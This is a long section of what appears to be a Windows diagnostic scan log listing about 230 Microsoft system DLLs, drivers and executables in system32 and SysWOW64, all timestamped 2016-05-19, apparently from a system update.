2016-05-19 23:18 - 2016-04-23 00:17 - 00529920 _____ (Microsoft Corporation) C:\Windows\system32\LogonController.dll
2016-05-19 23:18 - 2016-04-23 00:16 - 01319424 _____ (Microsoft Corporation) C:\Windows\system32\wifinetworkmanager.dll
2016-05-19 23:18 - 2016-04-23 00:15 - 00865792 _____ (Microsoft Corporation) C:\Windows\system32\AzureSettingSyncProvider.dll
2016-05-19 23:18 - 2016-04-23 00:15 - 00673280 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.dll
2016-05-19 23:18 - 2016-04-23 00:15 - 00348672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CredProvDataModel.dll
2016-05-19 23:18 - 2016-04-23 00:14 - 00821760 _____ (Microsoft Corporation) C:\Windows\system32\TokenBroker.dll
2016-05-19 23:18 - 2016-04-23 00:14 - 00354304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NetSetupShim.dll
2016-05-19 23:18 - 2016-04-23 00:13 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.dll
2016-05-19 23:18 - 2016-04-23 00:13 - 00434688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\LogonController.dll
2016-05-19 23:18 - 2016-04-23 00:10 - 00639488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TokenBroker.dll
2016-05-19 23:18 - 2016-04-23 00:05 - 05502976 _____ (Microsoft Corporation) C:\Windows\system32\d2d1.dll
2016-05-19 23:18 - 2016-04-23 00:05 - 01946112 _____ (Microsoft Corporation) C:\Windows\system32\dwmcore.dll
2016-05-19 23:18 - 2016-04-23 00:04 - 04759040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d2d1.dll
2016-05-19 23:18 - 2016-04-23 00:03 - 02000896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinui.appcore.dll
2016-05-19 23:18 - 2016-04-23 00:03 - 00754176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SettingSyncCore.dll
2016-05-19 23:18 - 2016-04-23 00:02 - 02444288 _____ (Microsoft Corporation) C:\Windows\system32\twinui.appcore.dll
2016-05-19 23:18 - 2016-04-23 00:00 - 00984576 _____ (Microsoft Corporation) C:\Windows\system32\SettingSyncCore.dll
2016-05-19 23:18 - 2016-04-22 22:10 - 00215040 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2016-05-19 23:18 - 2016-04-01 23:19 - 01054208 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2016-05-19 23:18 - 2016-03-29 06:22 - 01030416 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2016-05-19 23:18 - 2016-03-29 06:22 - 00874968 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2016-05-19 23:18 - 2016-03-29 06:20 - 02656952 _____ C:\Windows\system32\CoreUIComponents.dll
2016-05-19 23:18 - 2016-03-29 06:20 - 01317640 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2016-05-19 23:18 - 2016-03-29 06:20 - 01141504 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2016-05-19 23:18 - 2016-03-29 06:18 - 02152280 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ntfs.sys
2016-05-19 23:18 - 2016-03-29 06:02 - 00989536 _____ (Microsoft Corporation) C:\Windows\system32\SecConfig.efi
2016-05-19 23:18 - 2016-03-29 05:56 - 01297752 _____ (Microsoft Corporation) C:\Windows\system32\LicenseManager.dll
2016-05-19 23:18 - 2016-03-29 05:37 - 01862008 _____ C:\Windows\SysWOW64\CoreUIComponents.dll
2016-05-19 23:18 - 2016-03-29 05:28 - 00535080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dnsapi.dll
2016-05-19 23:18 - 2016-03-29 05:13 - 00986976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\LicenseManager.dll
2016-05-19 23:18 - 2016-03-29 05:08 - 00358752 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2016-05-19 23:18 - 2016-03-29 04:26 - 02403680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2016-05-19 23:18 - 2016-03-29 04:26 - 01089888 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\http.sys
2016-05-19 23:18 - 2016-03-29 04:24 - 00294752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2016-05-19 23:18 - 2016-03-29 04:21 - 00378208 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\USBXHCI.SYS
2016-05-19 23:18 - 2016-03-29 03:51 - 00181248 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rfcomm.sys
2016-05-19 23:18 - 2016-03-29 03:51 - 00167936 _____ (Microsoft Corporation) C:\Windows\system32\dafBth.dll
2016-05-19 23:18 - 2016-03-29 03:44 - 00230400 _____ (Microsoft Corporation) C:\Windows\system32\DAFWSD.dll
2016-05-19 23:18 - 2016-03-29 03:36 - 00530432 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\nwifi.sys
2016-05-19 23:18 - 2016-03-29 03:36 - 00209408 _____ (Microsoft Corporation) C:\Windows\system32\storewuauth.dll
2016-05-19 23:18 - 2016-03-29 03:30 - 00328192 _____ (Microsoft Corporation) C:\Windows\system32\profsvc.dll
2016-05-19 23:18 - 2016-03-29 03:27 - 00339968 _____ (Microsoft Corporation) C:\Windows\system32\SensorService.dll
2016-05-19 23:18 - 2016-03-29 03:23 - 00694784 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdiWiFi.sys
2016-05-19 23:18 - 2016-03-29 03:22 - 00438784 _____ (Microsoft Corporation) C:\Windows\system32\AccountsRt.dll
2016-05-19 23:18 - 2016-03-29 03:20 - 00948736 _____ (Microsoft Corporation) C:\Windows\system32\XblAuthManager.dll
2016-05-19 23:18 - 2016-03-29 03:20 - 00166400 _____ (Microsoft Corporation) C:\Windows\system32\AboveLockAppHost.dll
2016-05-19 23:18 - 2016-03-29 03:19 - 00556032 _____ (Microsoft Corporation) C:\Windows\system32\PsmServiceExtHost.dll
2016-05-19 23:18 - 2016-03-29 03:14 - 00859136 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.Store.dll
2016-05-19 23:18 - 2016-03-29 03:11 - 00881664 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Input.Inking.dll
2016-05-19 23:18 - 2016-03-29 03:09 - 01239552 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Bluetooth.dll
2016-05-19 23:18 - 2016-03-29 03:08 - 00888320 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Networking.dll
2016-05-19 23:18 - 2016-03-29 03:07 - 01902592 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2016-05-19 23:18 - 2016-03-29 03:06 - 01575936 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Speech.dll
2016-05-19 23:18 - 2016-03-29 03:05 - 01395712 _____ (Microsoft Corporation) C:\Windows\system32\UIAutomationCore.dll
2016-05-19 23:18 - 2016-03-29 03:03 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2016-05-19 23:18 - 2016-03-29 03:02 - 02624512 _____ (Microsoft Corporation) C:\Windows\system32\InputService.dll
2016-05-19 23:18 - 2016-03-29 03:02 - 01211904 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Cred.dll
2016-05-19 23:18 - 2016-03-29 03:00 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\TextInputFramework.dll
2016-05-19 23:18 - 2016-03-29 03:00 - 00235008 _____ C:\Windows\system32\MTF.dll
2016-05-19 23:18 - 2016-03-29 02:55 - 01052160 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.dll
2016-05-19 23:18 - 2016-03-29 02:49 - 00288256 _____ (Microsoft Corporation) C:\Windows\system32\fveui.dll
2016-05-19 23:18 - 2016-03-29 02:43 - 00358400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AccountsRt.dll
2016-05-19 23:18 - 2016-03-29 02:42 - 01410560 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Web.Http.dll
2016-05-19 23:18 - 2016-03-29 02:40 - 00787456 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Web.dll
2016-05-19 23:18 - 2016-03-29 02:39 - 00564224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSDApi.dll
2016-05-19 23:18 - 2016-03-29 02:36 - 03351040 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2016-05-19 23:18 - 2016-03-29 02:36 - 00649728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Store.dll
2016-05-19 23:18 - 2016-03-29 02:34 - 00682496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Input.Inking.dll
2016-05-19 23:18 - 2016-03-29 02:32 - 01588224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2016-05-19 23:18 - 2016-03-29 02:32 - 01098240 _____ (Microsoft Corporation) C:\Windows\system32\dosvc.dll
2016-05-19 23:18 - 2016-03-29 02:32 - 00854528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Bluetooth.dll
2016-05-19 23:18 - 2016-03-29 02:32 - 00638464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Networking.dll
2016-05-19 23:18 - 2016-03-29 02:31 - 01117184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Speech.dll
2016-05-19 23:18 - 2016-03-29 02:30 - 01139712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UIAutomationCore.dll
2016-05-19 23:18 - 2016-03-29 02:28 - 01944576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InputService.dll
2016-05-19 23:18 - 2016-03-29 02:28 - 00764928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Cred.dll
2016-05-19 23:18 - 2016-03-29 02:27 - 00245760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TextInputFramework.dll
2016-05-19 23:18 - 2016-03-29 02:27 - 00162816 _____ C:\Windows\SysWOW64\MTF.dll
2016-05-19 23:18 - 2016-03-29 02:23 - 00777728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MsSpellCheckingFacility.dll
2016-05-19 23:18 - 2016-03-29 02:17 - 00765952 _____ (Microsoft Corporation) C:\Windows\system32\fveapi.dll
2016-05-19 23:18 - 2016-03-29 02:14 - 01072128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Web.Http.dll
2016-05-19 23:18 - 2016-03-29 02:13 - 00592384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Web.dll
2016-05-19 23:18 - 2016-03-29 02:10 - 03671040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2016-05-19 23:18 - 2016-03-29 02:05 - 01388032 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2016-05-19 23:18 - 2016-03-29 02:05 - 00361472 _____ (Microsoft Corporation) C:\Windows\system32\bdesvc.dll
2016-05-19 23:18 - 2016-03-29 02:04 - 00688640 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Networking.Connectivity.dll
2016-05-19 23:18 - 2016-03-29 02:01 - 00957952 _____ (Microsoft Corporation) C:\Windows\system32\IKEEXT.DLL
2016-05-19 23:18 - 2016-03-29 01:45 - 03078144 _____ (Microsoft Corporation) C:\Windows\system32\esent.dll
2016-05-19 23:18 - 2016-03-29 01:45 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\ncbservice.dll
2016-05-19 23:18 - 2016-03-29 01:43 - 03428864 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.dll
2016-05-19 23:18 - 2016-03-29 01:43 - 00521728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Networking.Connectivity.dll
2016-05-19 23:18 - 2016-03-29 01:38 - 02798080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.dll
2016-05-19 23:18 - 2016-03-29 01:36 - 02722816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\esent.dll
2016-05-19 23:18 - 2016-03-29 01:26 - 00958976 _____ (Microsoft Corporation) C:\Windows\system32\RemoteNaturalLanguage.dll
2016-05-19 23:18 - 2016-03-29 01:25 - 00712704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RemoteNaturalLanguage.dll
2016-05-19 23:18 - 2016-03-01 01:31 - 00848168 _____ (Microsoft Corporation) C:\Windows\system32\mfsvr.dll
2016-05-19 23:18 - 2016-02-24 05:34 - 01613664 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2016-05-19 23:18 - 2016-02-24 04:58 - 00794888 _____ (Microsoft Corporation) C:\Windows\system32\mfds.dll
2016-05-19 23:18 - 2016-02-24 04:43 - 00625000 _____ (Microsoft Corporation) C:\Windows\system32\ClipSVC.dll
2016-05-19 23:18 - 2016-02-24 04:19 - 00670928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfds.dll
2016-05-19 23:18 - 2016-02-24 04:09 - 00640472 _____ (Microsoft Corporation) C:\Windows\system32\wer.dll
2016-05-19 23:18 - 2016-02-24 03:33 - 00538736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wer.dll
2016-05-19 23:18 - 2016-02-24 02:59 - 00450560 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Internal.Bluetooth.dll
2016-05-19 23:18 - 2016-02-24 02:59 - 00360448 _____ (Microsoft Corporation) C:\Windows\system32\vaultsvc.dll
2016-05-19 23:18 - 2016-02-24 02:44 - 00700416 _____ (Microsoft Corporation) C:\Windows\system32\AppointmentApis.dll
2016-05-19 23:18 - 2016-02-24 02:43 - 00286720 _____ (Microsoft Corporation) C:\Windows\system32\deviceaccess.dll
2016-05-19 23:18 - 2016-02-24 02:40 - 01224704 _____ (Microsoft Corporation) C:\Windows\system32\Unistore.dll
2016-05-19 23:18 - 2016-02-24 02:34 - 00938496 _____ (Microsoft Corporation) C:\Windows\system32\ContactApis.dll
2016-05-19 23:18 - 2016-02-24 02:21 - 00315904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Internal.Bluetooth.dll
2016-05-19 23:18 - 2016-02-24 02:18 - 01490432 _____ (Microsoft Corporation) C:\Windows\system32\UserDataService.dll
2016-05-19 23:18 - 2016-02-24 02:09 - 00552960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppointmentApis.dll
2016-05-19 23:18 - 2016-02-24 02:09 - 00228352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\deviceaccess.dll
2016-05-19 23:18 - 2016-02-24 02:07 - 00949248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Unistore.dll
2016-05-19 23:18 - 2016-02-24 02:04 - 01497088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMPDMC.exe
2016-05-19 23:18 - 2016-02-24 02:03 - 00769536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ContactApis.dll
2016-05-19 23:18 - 2016-02-23 06:32 - 02544264 _____ (Microsoft Corporation) C:\Windows\system32\mfcore.dll
2016-05-19 23:18 - 2016-02-23 06:32 - 01152328 _____ (Microsoft Corporation) C:\Windows\system32\mfasfsrcsnk.dll
2016-05-19 23:18 - 2016-02-23 06:32 - 01062480 _____ (Microsoft Corporation) C:\Windows\system32\mfmp4srcsnk.dll
2016-05-19 23:18 - 2016-02-23 06:31 - 01017032 _____ (Microsoft Corporation) C:\Windows\system32\mfsrcsnk.dll
2016-05-19 23:18 - 2016-02-23 06:31 - 00819648 _____ (Microsoft Corporation) C:\Windows\system32\mfmpeg2srcsnk.dll
2016-05-19 23:18 - 2016-02-23 06:31 - 00536256 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2016-05-19 23:18 - 2016-02-23 06:22 - 00572272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\taskschd.dll
2016-05-19 23:18 - 2016-02-23 05:45 - 02773096 _____ (Microsoft Corporation) C:\Windows\system32\d3d11.dll
2016-05-19 23:18 - 2016-02-23 05:38 - 02180136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfcore.dll
2016-05-19 23:18 - 2016-02-23 05:38 - 00980352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfasfsrcsnk.dll
2016-05-19 23:18 - 2016-02-23 05:38 - 00895080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfsrcsnk.dll
2016-05-19 23:18 - 2016-02-23 05:38 - 00882720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmp4srcsnk.dll
2016-05-19 23:18 - 2016-02-23 05:38 - 00420928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvproc.dll
2016-05-19 23:18 - 2016-02-23 05:37 - 00713824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmpeg2srcsnk.dll
2016-05-19 23:18 - 2016-02-23 05:27 - 00376536 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.MediaControl.dll
2016-05-19 23:18 - 2016-02-23 05:20 - 01139712 _____ (Microsoft Corporation) C:\Windows\system32\XblGameSave.dll
2016-05-19 23:18 - 2016-02-23 04:56 - 02186864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d11.dll
2016-05-19 23:18 - 2016-02-23 04:38 - 00320000 _____ (Microsoft Corporation) C:\Windows\system32\MSFlacDecoder.dll
2016-05-19 23:18 - 2016-02-23 04:38 - 00287712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.MediaControl.dll
2016-05-19 23:18 - 2016-02-23 04:37 - 00274944 _____ (Microsoft Corporation) C:\Windows\system32\DisplayManager.dll
2016-05-19 23:18 - 2016-02-23 04:36 - 00216576 _____ (Microsoft Corporation) C:\Windows\system32\QuickActionsDataModel.dll
2016-05-19 23:18 - 2016-02-23 04:34 - 00305664 _____ (Microsoft Corporation) C:\Windows\system32\wifiprofilessettinghandler.dll
2016-05-19 23:18 - 2016-02-23 04:31 - 00463360 _____ (Microsoft Corporation) C:\Windows\system32\wlansec.dll
2016-05-19 23:18 - 2016-02-23 04:29 - 00591872 _____ (Microsoft Corporation) C:\Windows\system32\SmsRouterSvc.dll
2016-05-19 23:18 - 2016-02-23 04:27 - 00307712 _____ (Microsoft Corporation) C:\Windows\system32\usbmon.dll
2016-05-19 23:18 - 2016-02-23 04:26 - 00372224 _____ (Microsoft Corporation) C:\Windows\system32\MDEServer.exe
2016-05-19 23:18 - 2016-02-23 04:22 - 00567808 _____ (Microsoft Corporation) C:\Windows\system32\MCRecvSrc.dll
2016-05-19 23:18 - 2016-02-23 04:20 - 00847360 _____ (Microsoft Corporation) C:\Windows\system32\netlogon.dll
2016-05-19 23:18 - 2016-02-23 04:20 - 00493568 _____ (Microsoft Corporation) C:\Windows\system32\mfmkvsrcsnk.dll
2016-05-19 23:18 - 2016-02-23 04:19 - 00517632 _____ (Microsoft Corporation) C:\Windows\system32\winspool.drv
2016-05-19 23:18 - 2016-02-23 04:14 - 00828928 _____ (Microsoft Corporation) C:\Windows\system32\Windows.AccountsControl.dll
2016-05-19 23:18 - 2016-02-23 04:10 - 00997376 _____ (Microsoft Corporation) C:\Windows\system32\schedsvc.dll
2016-05-19 23:18 - 2016-02-23 04:04 - 01131520 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Audio.dll
2016-05-19 23:18 - 2016-02-23 04:04 - 00382464 _____ (Microsoft Corporation) C:\Windows\system32\wuuhext.dll
2016-05-19 23:18 - 2016-02-23 04:02 - 00755712 _____ (Microsoft Corporation) C:\Windows\system32\spoolsv.exe
2016-05-19 23:18 - 2016-02-23 03:58 - 00163840 _____ (Microsoft Corporation) C:\Windows\system32\TimeBrokerServer.dll
2016-05-19 23:18 - 2016-02-23 03:52 - 00456704 _____ (Microsoft Corporation) C:\Windows\system32\ipnathlp.dll
2016-05-19 23:18 - 2016-02-23 03:48 - 00838144 _____ (Microsoft Corporation) C:\Windows\system32\uDWM.dll
2016-05-19 23:18 - 2016-02-23 03:38 - 00480256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MCRecvSrc.dll
2016-05-19 23:18 - 2016-02-23 03:37 - 01118208 _____ (Microsoft Corporation) C:\Windows\system32\localspl.dll
2016-05-19 23:18 - 2016-02-23 03:36 - 00713728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netlogon.dll
2016-05-19 23:18 - 2016-02-23 03:36 - 00379392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmkvsrcsnk.dll
2016-05-19 23:18 - 2016-02-23 03:35 - 00400896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winspool.drv
2016-05-19 23:18 - 2016-02-23 03:31 - 00585216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.AccountsControl.dll
2016-05-19 23:18 - 2016-02-23 03:24 - 04827136 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll
2016-05-19 23:18 - 2016-02-23 03:24 - 01105920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Audio.dll
2016-05-19 23:18 - 2016-02-23 03:01 - 02295808 _____ (Microsoft Corporation) C:\Windows\system32\wlansvc.dll
2016-05-19 23:18 - 2016-02-23 02:56 - 04412928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExplorerFrame.dll
2016-05-19 23:18 - 2016-02-23 02:41 - 02912256 _____ (Microsoft Corporation) C:\Windows\system32\CertEnroll.dll
2016-05-19 23:18 - 2016-02-23 02:33 - 02604032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CertEnroll.dll
2016-05-19 23:18 - 2016-01-27 01:57 - 01824264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\combase.dll
2016-05-19 23:18 - 2016-01-27 01:57 - 00820704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WinTypes.dll
2016-05-19 23:18 - 2016-01-27 01:46 - 02606824 _____ (Microsoft Corporation) C:\Windows\system32\combase.dll
2016-05-19 23:18 - 2016-01-27 01:46 - 01270072 _____ (Microsoft Corporation) C:\Windows\system32\WinTypes.dll
2016-05-19 23:18 - 2016-01-16 02:24 - 00538632 _____ (Microsoft Corporation) C:\Windows\system32\WWanAPI.dll
2016-05-19 23:18 - 2016-01-16 02:23 - 00785088 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2016-05-19 23:18 - 2016-01-16 02:21 - 01750440 _____ (Microsoft Corporation) C:\Windows\system32\WpcMon.exe
2016-05-19 23:18 - 2016-01-16 02:20 - 00652312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2016-05-19 23:18 - 2016-01-16 02:20 - 00431240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WWanAPI.dll
2016-05-19 23:18 - 2016-01-16 02:19 - 00405568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll
2016-05-19 23:18 - 2016-01-16 02:12 - 01415200 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll
2016-05-19 23:18 - 2016-01-16 02:08 - 01174008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctf.dll
2016-05-19 23:18 - 2016-01-16 02:08 - 00440152 _____ (Microsoft Corporation) C:\Windows\system32\services.exe
2016-05-19 23:18 - 2016-01-16 01:32 - 00621568 _____ (Microsoft Corporation) C:\Windows\system32\wbiosrvc.dll
2016-05-19 23:18 - 2016-01-16 01:31 - 00343552 _____ (Microsoft Corporation) C:\Windows\system32\SensorsApi.dll
2016-05-19 23:18 - 2016-01-16 01:30 - 02127360 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2016-05-19 23:18 - 2016-01-16 01:29 - 01500672 _____ (Microsoft Corporation) C:\Windows\system32\RecoveryDrive.exe
2016-05-19 23:18 - 2016-01-16 01:27 - 00335872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2016-05-19 23:18 - 2016-01-16 01:26 - 00260608 _____ C:\Windows\system32\MTFServer.dll
2016-05-19 23:18 - 2016-01-16 01:24 - 02057216 _____ (Microsoft Corporation) C:\Windows\system32\wlidsvc.dll
2016-05-19 23:18 - 2016-01-16 01:24 - 00273408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SensorsApi.dll
2016-05-19 23:18 - 2016-01-16 01:23 - 02050048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2016-05-19 23:18 - 2016-01-16 01:18 - 01674240 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2016-05-19 23:18 - 2016-01-16 01:16 - 01542656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2016-05-19 23:18 - 2016-01-04 22:50 - 00671472 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2016-05-19 23:18 - 2016-01-04 22:45 - 02587696 _____ (Microsoft Corporation) C:\Windows\system32\msxml6.dll
2016-05-19 23:18 - 2016-01-04 22:42 - 02026736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml6.dll
2016-05-19 23:18 - 2016-01-04 22:37 - 01299504 _____ (Microsoft Corporation) C:\Windows\system32\mfnetsrc.dll
2016-05-19 23:18 - 2016-01-04 22:37 - 00858952 _____ (Microsoft Corporation) C:\Windows\system32\mfnetcore.dll
2016-05-19 23:18 - 2016-01-04 22:37 - 00234504 _____ (Microsoft Corporation) C:\Windows\system32\mftranscode.dll
2016-05-19 23:18 - 2016-01-04 22:33 - 01118208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfnetsrc.dll
2016-05-19 23:18 - 2016-01-04 22:33 - 00701384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfnetcore.dll
2016-05-19 23:18 - 2016-01-04 22:33 - 00208176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mftranscode.dll
2016-05-19 23:18 - 2016-01-04 22:23 - 01804664 _____ (Microsoft Corporation) C:\Windows\system32\WMALFXGFXDSP.dll
2016-05-19 23:18 - 2016-01-04 22:23 - 00786696 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOD.DLL
2016-05-19 23:18 - 2016-01-04 22:17 - 00695752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOD.DLL
2016-05-19 23:18 - 2016-01-04 21:50 - 00644096 _____ (Microsoft Corporation) C:\Windows\system32\uReFS.dll
2016-05-19 23:18 - 2016-01-04 21:49 - 00749056 _____ (Microsoft Corporation) C:\Windows\system32\PhoneService.dll
2016-05-19 23:18 - 2016-01-04 21:48 - 01009152 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOD.DLL
2016-05-19 23:18 - 2016-01-04 21:45 - 00678912 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll
2016-05-19 23:18 - 2016-01-04 21:45 - 00275968 _____ (Microsoft Corporation) C:\Windows\system32\facecredentialprovider.dll
2016-05-19 23:18 - 2016-01-04 21:43 - 00912384 _____ (Microsoft Corporation) C:\Windows\system32\usermgr.dll
2016-05-19 23:18 - 2016-01-04 21:41 - 00558592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\uReFS.dll
2016-05-19 23:18 - 2016-01-04 21:39 - 00569856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2016-05-19 23:18 - 2016-01-04 21:36 - 00573440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll
2016-05-19 23:18 - 2015-12-07 00:48 - 00526856 _____ (Microsoft Corporation) C:\Windows\system32\mfreadwrite.dll
2016-05-19 23:18 - 2015-12-07 00:48 - 00462760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfreadwrite.dll
2016-05-19 23:18 - 2015-12-07 00:48 - 00337840 _____ (Microsoft Corporation) C:\Windows\system32\MFPlay.dll
2016-05-19 23:18 - 2015-12-07 00:48 - 00289248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFPlay.dll
2016-05-19 23:18 - 2015-12-07 00:45 - 00264544 _____ (Microsoft Corporation) C:\Windows\system32\ContentDeliveryManager.Utilities.dll
2016-05-19 23:18 - 2015-12-07 00:15 - 01035776 _____ (Microsoft Corporation) C:\Windows\system32\XboxNetApiSvc.dll
2016-05-19 23:18 - 2015-12-07 00:10 - 00824320 _____ (Microsoft Corporation) C:\Windows\system32\WpcWebFilter.dll
2016-05-19 23:18 - 2015-12-07 00:06 - 00572928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WpcWebFilter.dll
2016-05-19 23:18 - 2015-12-06 23:45 - 00900608 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Networking.BackgroundTransfer.dll
2016-05-19 23:18 - 2015-12-06 23:45 - 00683008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Networking.BackgroundTransfer.dll
2016-05-19 23:18 - 2015-11-24 04:52 - 01717248 _____ (Microsoft Corporation) C:\Windows\system32\GdiPlus.dll
2016-05-19 23:18 - 2015-11-24 04:49 - 01648640 _____ (Microsoft Corporation) C:\Windows\system32\comsvcs.dll
2016-05-19 23:18 - 2015-11-24 03:59 - 01467392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\GdiPlus.dll
2016-05-19 23:18 - 2015-11-24 03:57 - 01328128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comsvcs.dll
2016-05-19 23:18 - 2015-11-24 03:29 - 02352128 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2016-05-19 23:18 - 2015-11-24 03:04 - 02155008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2016-05-19 23:18 - 2015-11-22 05:54 - 00138240 _____ (Microsoft Corporation) C:\Windows\system32\ETWCoreUIComponentsResources.dll
